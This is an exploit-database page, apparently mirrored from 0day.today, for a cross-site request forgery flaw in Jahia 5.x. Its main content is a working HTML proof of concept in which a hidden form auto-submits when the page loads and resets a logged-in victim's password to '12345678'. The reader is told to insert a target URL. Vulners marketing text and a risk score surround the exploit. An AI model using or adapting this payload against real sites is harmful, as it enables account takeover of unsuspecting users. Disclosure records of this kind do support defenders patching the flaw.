Lucene search
+L

Jahia 5.x CSRF Exploit

🗓️ 09 Dec 2012 00:00:00Reported by Liz ViciousType 
zdt
 zdt
🔗 0day.today👁 29 Views

Jahia 5.x CSRF Exploit allowing unauthorized password chang

Code
------------------------------------------------------------------
-- [ Info ] ------------------------------------------------------
------------------------------------------------------------------

Jahia 5.x CSRF Exploit
Jahia is vulnerable to cross-site request forgery because of not validating form data.
Tested on: 5.0.5
Disclosure date: 2012-12-09

------------------------------------------------------------------
-- [ Description ] -----------------------------------------------
------------------------------------------------------------------

Change __TARGET__ with your target url

Example: http://localhost:8080/jahia/Jahia/engineName/mysettings/op/edit/pid/1?mode=display&screen=save

------------------------------------------------------------------
-- [ PoC ] -------------------------------------------------------
------------------------------------------------------------------

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Password</H2>
<form method="POST" name="form0" action="__TARGET__">
<input type="hidden" name="mysettings-user-password" value="12345678"/>
<input type="hidden" name="mysettings-user-passwordConfirmation" value="12345678"/>
</form>
</html> 

------------------------------------------------------------------
-- [ Screenshots ] -----------------------------------------------
------------------------------------------------------------------

http://i.imagebanana.com/img/2yjijj6z/_007.png
http://i.imagebanana.com/img/7sqdtcpv/_006.jpg

------------------------------------------------------------------
-- [ Author ] ----------------------------------------------------
------------------------------------------------------------------

Author: Liz Vicious
Greetz: mx, stranger, helats, double trouble, BlackCoin family

#  0day.today [2018-03-13]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Dec 2012 00:00Current
7High risk
Vulners AI Score7
29